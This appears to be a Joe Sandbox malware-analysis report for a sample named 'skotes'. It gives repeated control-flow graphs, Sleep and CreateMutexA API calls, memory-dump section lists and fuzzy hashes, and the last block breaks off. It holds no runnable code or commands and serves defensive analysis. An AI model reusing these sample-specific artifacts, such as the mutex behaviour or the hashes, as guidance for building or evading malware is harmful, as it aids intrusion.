                                                                                                                control_flow_graph 22 789f44-789f64 26 789f92-789fae 22->26 27 789f66-789f72 22->27 28 789fdc-789ffb 26->28 29 789fb0-789fbc 26->29 30 789f88-789f8f call 79d663 27->30 31 789f74-789f82 27->31 34 78a029-78a916 call 7980c0 28->34 35 789ffd-78a009 28->35 32 789fbe-789fcc 29->32 33 789fd2-789fd9 call 79d663 29->33 30->26 31->30 36 78a92b 31->36 32->33 32->36 33->28 39 78a00b-78a019 35->39 40 78a01f-78a026 call 79d663 35->40 42 78a953-78a994 Sleep CreateMutexA 36->42 43 78a92b call 7b6c6a 36->43 39->36 39->40 40->34 52 78a996-78a998 42->52 53 78a9a7-78a9a8 42->53 43->42 52->53 54 78a99a-78a9a5 52->54 54->53
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: df5d06f2155a679c52986e9b76c6e41bc74542844430bf457c6742f8329da858
                                                                                                                • Instruction ID: 695b71d61dddf2b909e4b552f7e2e9719cd09b5c2ce8e312e420c81f075d2677
                                                                                                                • Opcode Fuzzy Hash: df5d06f2155a679c52986e9b76c6e41bc74542844430bf457c6742f8329da858
                                                                                                                • Instruction Fuzzy Hash: C1312831644104ABFB18BBB8DC897ADB762EBC5310F24821AE154E72D1E73EA9848712

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 56 78a079-78a099 60 78a09b-78a0a7 56->60 61 78a0c7-78a0e3 56->61 62 78a0a9-78a0b7 60->62 63 78a0bd-78a0c4 call 79d663 60->63 64 78a111-78a130 61->64 65 78a0e5-78a0f1 61->65 62->63 68 78a930-78a994 call 7b6c6a Sleep CreateMutexA 62->68 63->61 66 78a15e-78a916 call 7980c0 64->66 67 78a132-78a13e 64->67 70 78a0f3-78a101 65->70 71 78a107-78a10e call 79d663 65->71 72 78a140-78a14e 67->72 73 78a154-78a15b call 79d663 67->73 86 78a996-78a998 68->86 87 78a9a7-78a9a8 68->87 70->68 70->71 71->64 72->68 72->73 73->66 86->87 88 78a99a-78a9a5 86->88 88->87
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 00ab959046e0395f8522ab972af2cbb574b97cb9468e4b5012257e3b1f8ad70c
                                                                                                                • Instruction ID: 96f22cf4307cdb85ad697ad79261378795f5bc52f6a06295a83543d2661f55bc
                                                                                                                • Opcode Fuzzy Hash: 00ab959046e0395f8522ab972af2cbb574b97cb9468e4b5012257e3b1f8ad70c
                                                                                                                • Instruction Fuzzy Hash: 48312931A54104ABFB18ABBCDC8D75DB772DB85314F24821AE014972D1E73EA9848712

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 90 78a1ae-78a1ce 94 78a1fc-78a218 90->94 95 78a1d0-78a1dc 90->95 98 78a21a-78a226 94->98 99 78a246-78a265 94->99 96 78a1de-78a1ec 95->96 97 78a1f2-78a1f9 call 79d663 95->97 96->97 102 78a935 96->102 97->94 104 78a228-78a236 98->104 105 78a23c-78a243 call 79d663 98->105 100 78a293-78a916 call 7980c0 99->100 101 78a267-78a273 99->101 107 78a289-78a290 call 79d663 101->107 108 78a275-78a283 101->108 110 78a953-78a994 Sleep CreateMutexA 102->110 111 78a935 call 7b6c6a 102->111 104->102 104->105 105->99 107->100 108->102 108->107 120 78a996-78a998 110->120 121 78a9a7-78a9a8 110->121 111->110 120->121 122 78a99a-78a9a5 120->122 122->121
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: 802d955416e676679f0a55c22fcab2b110103c34189427ce110c4c10a3c5ba2b
                                                                                                                • Instruction ID: 7badf7d32cf9dc0e3065bd17ac941ecefa2092538bd2b7553f1096e6e530f8ca
                                                                                                                • Opcode Fuzzy Hash: 802d955416e676679f0a55c22fcab2b110103c34189427ce110c4c10a3c5ba2b
                                                                                                                • Instruction Fuzzy Hash: E9312831A44144ABFB18BBBCDC8DB6DB772EBC6310F24821EE054972D1D73EA9848712

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 124 78a418-78a438 128 78a43a-78a446 124->128 129 78a466-78a482 124->129 130 78a448-78a456 128->130 131 78a45c-78a463 call 79d663 128->131 132 78a4b0-78a4cf 129->132 133 78a484-78a490 129->133 130->131 136 78a93f-78a949 call 7b6c6a * 2 130->136 131->129 134 78a4fd-78a916 call 7980c0 132->134 135 78a4d1-78a4dd 132->135 138 78a492-78a4a0 133->138 139 78a4a6-78a4ad call 79d663 133->139 140 78a4df-78a4ed 135->140 141 78a4f3-78a4fa call 79d663 135->141 155 78a94e 136->155 156 78a949 call 7b6c6a 136->156 138->136 138->139 139->132 140->136 140->141 141->134 157 78a953-78a994 Sleep CreateMutexA 155->157 158 78a94e call 7b6c6a 155->158 156->155 160 78a996-78a998 157->160 161 78a9a7-78a9a8 157->161 158->157 160->161 162 78a99a-78a9a5 160->162 162->161
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398383280.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398423795.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398468212.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398506234.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398544821.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398620894.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398660973.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398704982.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398756330.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398795794.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398823410.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398863242.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398926080.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398964417.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399054722.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399092663.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399132506.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399179169.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2399210380.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateMutexSleep
                                                                                                                • String ID: T2~
                                                                                                                • API String ID: 1464230837-3459864372
                                                                                                                • Opcode ID: ce7f0ac9939007c11a586097979a52c698aa745e5a313a364dcec4eaf57e6678
                                                                                                                • Instruction ID: 0e021f6d48a1aee757f79dc1516320e77507d30653585eaa93fd87bb23613119
                                                                                                                • Opcode Fuzzy Hash: ce7f0ac9939007c11a586097979a52c698aa745e5a313a364dcec4eaf57e6678
                                                                                                                • Instruction Fuzzy Hash: 1A311931A44140EBFF18BBBCD88D76DB671EBC5314F20821AE058972D6D77DA9848762

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 164 78a54d-78a56d 168 78a59b-78a5b7 164->168 169 78a56f-78a57b 164->169 172 78a5b9-78a5c5 168->172 173 78a5e5-78a604 168->173 170 78a57d-78a58b 169->170 171 78a591-78a598 call 79d663 169->171 170->171 174 78a944-78a949 call 7b6c6a 170->174 171->168 176 78a5db-78a5e2 call 79d663 172->176 177 78a5c7-78a5d5 172->177 178 78a632-78a916 call 7980c0 173->178 179 78a606-78a612 173->179 190 78a94e 174->190 191 78a949 call 7b6c6a 174->191 176->173 177->174 177->176 184 78a628-78a62f call 79d663 179->184 185 78a614-78a622 179->185 184->178 185->174 185->184 195 78a953-78a994 Sleep CreateMutexA 190->195 196 78a94e call 7b6c6a 190->196 191->190 198 78a996-78a998 195->198 199 78a9a7-78a9a8 195->199 196->195 198->199 200 78a99a-78a9a5 198->200 200->199
                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000064), ref: 0078A963
                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,007E3254), ref: 0078A981
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2393303767.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2393279382.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2393303767.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396852637.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396918140.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2396965828.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397770050.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397820748.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397857006.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397929180.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2397969761.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398006650.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398036521.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398093425.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398144817.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398194502.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398237167.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398279524.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2398323812.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
